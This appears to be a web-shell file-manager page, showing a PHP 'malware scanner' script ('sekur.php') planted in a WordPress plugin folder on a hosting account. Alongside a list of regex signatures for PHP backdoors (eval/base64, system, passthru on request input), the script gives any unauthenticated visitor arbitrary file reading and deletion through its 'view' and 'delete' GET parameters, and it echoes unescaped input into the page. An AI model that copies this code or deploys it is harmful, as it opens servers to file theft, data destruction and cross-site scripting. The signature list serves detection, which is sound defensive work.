RootZanli & NinjaCr3

: / home / o5t6x7pgljbm / public_html / wp-content / plugins / wowkeren / pro /
Filename : sekur.php
back
<?php
session_start();

// LOGGING SYSTEM
$log_file = 'scan_log_'.date('Y-m-d').'.txt';
function log_action($message) {
    global $log_file;
    $log_entry = "[".date('Y-m-d H:i:s')."] ".$_SERVER['REMOTE_ADDR']." - ".$message.PHP_EOL;
    file_put_contents($log_file, $log_entry, FILE_APPEND);
}

// MALWARE SIGNATURES (Partial list - should be expanded)
$malware_signatures = [
    '/eval\(base64_decode\(/i',
    '/system\(\$_GET\[/i',
    '/shell_exec\(\$_POST\[/i',
    '/<\?php\s+\$[a-z0-9_]+\s*=\s*[\'"]\w+[\'"]\s*;/i',
    '/@ini_set\(\'display_errors\',\'0\'\)/i',
    '/preg_replace\(\'\/\.\*\/e\',\'/i',
    '/\$[a-z0-9_]+\s*\(\$[a-z0-9_]+\s*\(/i',
    '/<\?(php)?\s+@?\$_(GET|POST|REQUEST|COOKIE)\[/i',
    '/passthru\(\$_(GET|POST)/i',
    '/file_put_contents\(.*\$_(GET|POST)/i'
];

// FILE ORIGIN DETECTION
function detect_file_origin($file_path) {
    $origin_info = [];
    
    // Check owner
    $owner = posix_getpwuid(fileowner($file_path));
    $origin_info['owner'] = $owner['name'] ?? 'unknown';
    
    // Check creation/modification time
    $origin_info['created'] = date('Y-m-d H:i:s', filectime($file_path));
    $origin_info['modified'] = date('Y-m-d H:i:s', filemtime($file_path));
    
    // Check if file was uploaded via POST
    $origin_info['uploaded'] = false;
    if (isset($_FILES) && count($_FILES) > 0) {
        foreach ($_FILES as $file) {
            if ($file['tmp_name'] == $file_path) {
                $origin_info['uploaded'] = true;
                break;
            }
        }
    }
    
    return $origin_info;
}

// ENHANCED SCANNER
function scanDirectory($dir, $dangerous_ext, $days_recent = 10) {
    global $malware_signatures;
    $dangerous_files = [];
    $recent_threshold = time() - ($days_recent * 24 * 60 * 60);
    
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir),
        RecursiveIteratorIterator::LEAVES_ONLY
    );

    foreach ($files as $file) {
        if ($file->isDir()) continue;
        
        $file_path = $file->getRealPath();
        $ext = strtolower($file->getExtension());
        
        // Check if file is recent
        $is_recent = ($file->getMTime() > $recent_threshold);
        
        // Check by extension
        $by_extension = in_array($ext, $dangerous_ext);
        
        // Check by content signature
        $by_signature = false;
        $file_content = file_get_contents($file_path);
        foreach ($malware_signatures as $sig) {
            if (preg_match($sig, $file_content)) {
                $by_signature = true;
                break;
            }
        }
        
        if ($by_extension || $by_signature || $is_recent) {
            $dangerous_files[] = [
                'path' => $file_path,
                'extension' => $ext,
                'malware_signature' => $by_signature,
                'recent' => $is_recent,
                'origin' => detect_file_origin($file_path),
                'size' => filesize($file_path),
                'modified' => date('Y-m-d H:i:s', $file->getMTime())
            ];
        }
    }
    
    return $dangerous_files;
}

$dangerous_ext = ['php','phtml','php56','phar','pl','cgi','jsp','asp','aspx','exe','sh','php7','shtml','sh','phpx','pht','fla','phpt'];
$dir_to_scan = '/home/hmtmtuedu/public_html/';
$days_recent = isset($_GET['days']) ? (int)$_GET['days'] : 10;

// Handle actions
if (isset($_GET['view'])) {
    $file_to_view = $_GET['view'];
    if (file_exists($file_to_view)) {
        log_action("Viewed file: $file_to_view");
        $file_contents = htmlspecialchars(file_get_contents($file_to_view));
        echo "<h3>File: $file_to_view</h3>";
        echo "<pre>$file_contents</pre>";
        echo "<br><a href='?delete=$file_to_view'>Delete this file</a><br>";
    }
} elseif (isset($_GET['delete'])) {
    $file_to_delete = $_GET['delete'];
    if (file_exists($file_to_delete)) {
        unlink($file_to_delete);
        log_action("Deleted file: $file_to_delete");
        echo "File $file_to_delete deleted.<br>";
    }
}

// Scan directory
$dangerous_files = scanDirectory($dir_to_scan, $dangerous_ext, $days_recent);

// Display results
echo "<h2>Enhanced Malware Scanner</h2>";
echo "<form method='get'>
        Show files modified in last <input type='number' name='days' value='$days_recent' min='1' max='365'> days
        <input type='submit' value='Update'>
      </form>";

if (count($dangerous_files) > 0) {
    echo "<h3>Potentially Dangerous Files (Last $days_recent days)</h3>";
    echo "<table border='1' cellpadding='5'>
            <tr>
                <th>File</th>
                <th>Size</th>
                <th>Modified</th>
                <th>Owner</th>
                <th>Flags</th>
                <th>Actions</th>
            </tr>";

    foreach ($dangerous_files as $file) {
        $flags = [];
        if ($file['malware_signature']) $flags[] = "MALWARE";
        if ($file['recent']) $flags[] = "RECENT";
        if ($file['origin']['uploaded']) $flags[] = "UPLOADED";
        
        echo "<tr>
                <td>".basename($file['path'])."</td>
                <td>".round($file['size']/1024, 2)." KB</td>
                <td>".$file['modified']."</td>
                <td>".$file['origin']['owner']."</td>
                <td>".implode(", ", $flags)."</td>
                <td>
                    <a href='?view=".$file['path']."'>View</a> | 
                    <a href='?delete=".$file['path']."' onclick='return confirm(\"Delete this file?\");'>Delete</a>
                </td>
              </tr>";
    }
    echo "</table>";
} else {
    echo "<p>No dangerous files found.</p>";
}

// Show scan log if exists
if (file_exists($log_file)) {
    echo "<h3>Scan Log</h3>";
    echo "<pre>".htmlspecialchars(file_get_contents($log_file))."</pre>";
}
?>